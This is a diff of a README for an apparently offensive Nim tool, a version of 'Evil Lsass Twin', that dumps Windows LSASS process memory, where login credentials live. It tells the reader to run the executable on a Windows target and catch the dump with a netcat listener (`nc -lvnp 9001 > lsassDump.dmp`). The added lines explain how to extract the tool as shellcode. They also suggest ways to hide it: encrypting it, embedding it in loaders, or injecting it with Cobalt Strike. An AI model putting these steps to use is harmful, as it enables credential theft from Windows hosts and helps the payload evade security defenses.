RePRGM/Nimperiments/Nimless/README.md

 Third, if and only if you want to use a different port, change line 232.

 If you've used Evil Lsass Twin before, you know how to use this version.

 Compile -> Set up a listener on your server (ex: `nc -lvnp 9001 > lsassDump.dmp`) -> Run executable on Windows target

+To use as PIC:

+Compile -> Change and run `pic.py` script -> Use output file as desired

+The `pic.py` script will write the raw bytes of the .text section to a new file.
+This is your shellcode.
+What you do with it is up to you.
+Ideas:
+1. Embed the file into a shellcode loader with a language such as with Golang's `embed` directive or Nim's `slurp` function.
+2. Parse the file with a custom script, encode/encrypt (hex, base64, UUID, MAC, AES, XOR) the raw bytes, and copy/paste into file (*don't really recommend.
+5KB in size*).
+3. Parse the file with a custom script that adds the encoded/encrypted bytes to a shellcode loader automatically
+4. Cobalt Strike `shinject` command or other similar C2 functionality

 ## Notes
 - Some Winim converters (such as `winstrConverterStringToLPWSTR`) may cause compiler and linker errors as these attempt to reference standard library and Win32 API functions.